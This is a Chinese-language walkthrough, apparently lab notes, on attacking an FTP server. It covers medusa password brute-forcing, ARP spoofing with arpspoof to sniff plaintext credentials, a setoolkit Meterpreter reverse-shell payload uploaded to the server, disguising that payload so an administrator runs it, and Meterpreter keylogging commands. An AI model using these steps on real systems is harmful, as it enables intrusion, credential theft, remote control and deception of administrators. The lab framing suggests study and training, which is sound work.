FTP暴力破解密码
首先建立账户,使用 net user username password /add 建立用户
然后 net localgroup administrators username /add 将用户加入管理员组
在FTP站点中加入新建立的用户,允许其远程登陆—服务器准备工作配置完毕
在kali中下载medusa // 使用 sudo apt-get install medusa 安装
安装后 需要准备一个密码文件 如pass.txt 将正确的密码放入其中(或者字典)
使用命令 medusa -h IP -u username -P pass.txt -M ftp
后面这个ftp是模块的意思 可使用medusa -d 查看模块
FTP明文用户名、密码嗅探
FTP明文用户名、密码嗅探:
在用户名与密码传输的过程中,可以使用wireshark进行嗅探(也可以添加ftp作为过滤)
在此之前 利用arpspoof 进行arp欺骗
arpspoof -i eth0 192.168.1.1 -t 192.168.1.105 -i eth0 指的是网卡 要欺骗的目标是1.105 欺骗的1.105,让报文发送到kali而不是网关1.1
FTP登陆之后可以做的事情
可以利用 matasploit 创建反弹shell上传到FTP服务器。
可以利用setoolkit快速生成反弹shell,当管理员点击shell之后,后端就可以弹出cmd窗口
- 首先,输入setoolkit
- 选择Social-Engineering Attacks
- 选择Create a Payload and listen
- 选择Windows Reverse_TCP Meterpreter
- 输入Listener的IP(谁监听):(可以用ifconfig查看)
- 输入监听的端口:(不要选择常用端口,可以利用netstat -pantu 查看目前的端口被占用情况)
- 然后就会自动生成payload(在/root/.set/payload.exe),开始监听
- 移动payload 到桌面 mv /root/.set/payload.exe /root/Desktop
- 利用win下面的FlashFXP工具/命令行工具将文件上传到c:/inetpub/ftproot下面(自己做实验可以复制过去)
- 诱惑管理员点击payload 可以修改图标、重命名、隐藏后缀等
- kali出现对应连接
- 输入sessions -l进行查看
- 输入sessions -i 数字 选择对应的数字选择session
- 就可以开始执行命令了,也可以进行键盘记录(keyscan_start) 对应通过keyscan_dump 查看键盘记录